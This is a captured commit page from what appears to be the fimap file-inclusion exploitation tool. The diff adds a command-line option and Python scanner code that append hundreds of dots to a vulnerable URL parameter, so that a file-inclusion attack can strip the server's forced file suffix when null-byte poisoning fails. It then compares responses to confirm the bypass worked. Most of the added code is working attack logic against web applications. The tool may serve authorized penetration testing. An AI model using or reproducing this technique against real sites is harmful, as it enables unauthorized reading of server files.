Commit f2df44a1 authored by fimap.dev@gmail.com's avatar fimap.dev@gmail.com

Added first code for dot truncation technique.

parent 2ad98e13
......@@ -57,9 +57,15 @@ def show_help(AndQuit=False):
print " -H , --harvest Mode to harvest a URL recursivly for new URLs."
print " Needs a root url (-u) to start crawling there."
print " Also needs (-w) to write a URL list for mass mode."
print "## Techniques:"
#dot-truncation
print " -b , --enable-blind Enables blind FI-Bug testing when no error messages are printed."
print " Note that this mode will cause lots of requests compared to the"
print " default method. Can be used with -s, -m or -g. Experimental."
print " -D , --dot-truncation Enables dot truncation technique to get rid of the suffix if"
print " the default mode (nullbyte poison) failed. This mode can cause"
print " tons of requests depending how you configure it."
print " Can be used with -s, -m or -g. Experimental."
print "## Variables:"
print " -u , --url=URL The URL you want to test."
print " Needed in single mode (-s)."
......@@ -195,6 +201,7 @@ if __name__ == "__main__":
config["p_maxtries"] = 5
config["p_skippages"] = 0
config["p_monkeymode"] = False
config["p_doDotTruncation"] = False
config["p_proxy"] = None
config["p_ttl"] = 30
config["p_post"] = ""
......@@ -223,8 +230,8 @@ if __name__ == "__main__":
"harvest" , "write=" , "depth=" , "greetings" , "test-rfi" , "skip-pages=",
"show-my-ip" , "enable-blind", "http-proxy=" , "ttl=" , "post=" , "no-auto-detect",
"plugins" , "enable-color", "update-def" , "merge-xml=" , "install-plugins" , "results=",
"googlesleep="]
optlist, args = getopt.getopt(sys.argv[1:], "u:msl:v:hA:gq:p:sxHw:d:bP:CI", longSwitches)
"googlesleep=" , "dot-truncation"]
optlist, args = getopt.getopt(sys.argv[1:], "u:msl:v:hA:gq:p:sxHw:d:bP:CID", longSwitches)
startExploiter = False
......@@ -267,6 +274,8 @@ if __name__ == "__main__":
doRFITest = True
if (k in ("-b", "--enable-blind")):
config["p_monkeymode"] = True
if (k in ("-D", "--dot-truncation")):
config["p_doDotTruncation"] = True
if (k in ("-C", "--enable-color")):
config["p_color"] = True
if (k in ("--skip-pages",)):
......
......@@ -26,6 +26,8 @@ import re,os
import os.path
import posixpath
import ntpath
import difflib
import time
__author__="Iman Karim(ikarim2s@smail.inf.fh-brs.de)"
__date__ ="$30.08.2009 19:59:44$"
......@@ -43,7 +45,7 @@ class targetScanner (baseClass.baseClass):
self._log("Parsing URL '%s'..."%(self.Target_URL), self.LOG_ALWAYS)
if (self.Target_URL.find("?") == -1):
if (self.Target_URL.count("?") == 0):
self._log("Target URL doesn't have any params.", self.LOG_DEBUG);
else:
data = self.Target_URL.split("?")[1]
......@@ -374,6 +376,46 @@ class targetScanner (baseClass.baseClass):
r.setSurfix("%00")
r.setNullBytePossible(True)
if (not r.NullbytePoison and self.config["p_doDotTruncation"]):
self._log("Trying Dot Truncation to get rid of the suffix...", self.LOG_INFO)
dot_trunc_start = 700
dot_trunc_end = 800
dot_trunc_step = 50
max_diff = 0.095
self._log("Preparing Dot Truncation comparation string...", self.LOG_DEBUG)
tmpurl = URL
code1 = self.doGetRequest(URL)
vulnParamBlock = "%s=%s%s"%(VulnParam, Params[VulnParam], r.getAppendix())
desturl = tmpurl.replace("%s=%s"%(VulnParam,Params[VulnParam]), vulnParamBlock)
self._log("Test URL will be: " + desturl, self.LOG_DEVEL)
success = False
seqmatcher = difflib.SequenceMatcher()
for i in range (dot_trunc_start, dot_trunc_end, dot_trunc_step):
tmpurl = desturl
desturl = desturl.replace(vulnParamBlock, "%s%s"%(vulnParamBlock, "." * i))
content = self.doGetRequest(desturl)
if (content == None):
self._log("Dot Truncation testing failed :(", self.LOG_WARN)
break
seqmatcher.set_seqs(code1, content)
ratio = seqmatcher.ratio()
if (1-max_diff <= ratio <= 1):
self._log("Dot Truncation successfull with: %d dots ; %f ratio)!" %(i, ratio), self.LOG_INFO)
r.setSurfix("." * i)
r.setNullBytePossible(True)
success = True
break
else:
self._log("No luck with (%s)..." %(i), self.LOG_DEBUG)
if (not success):
self._log("Dot Truncation not possible :(", self.LOG_INFO)
if (scriptpath == ""):
# Failed to get scriptpath with easy method :(
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment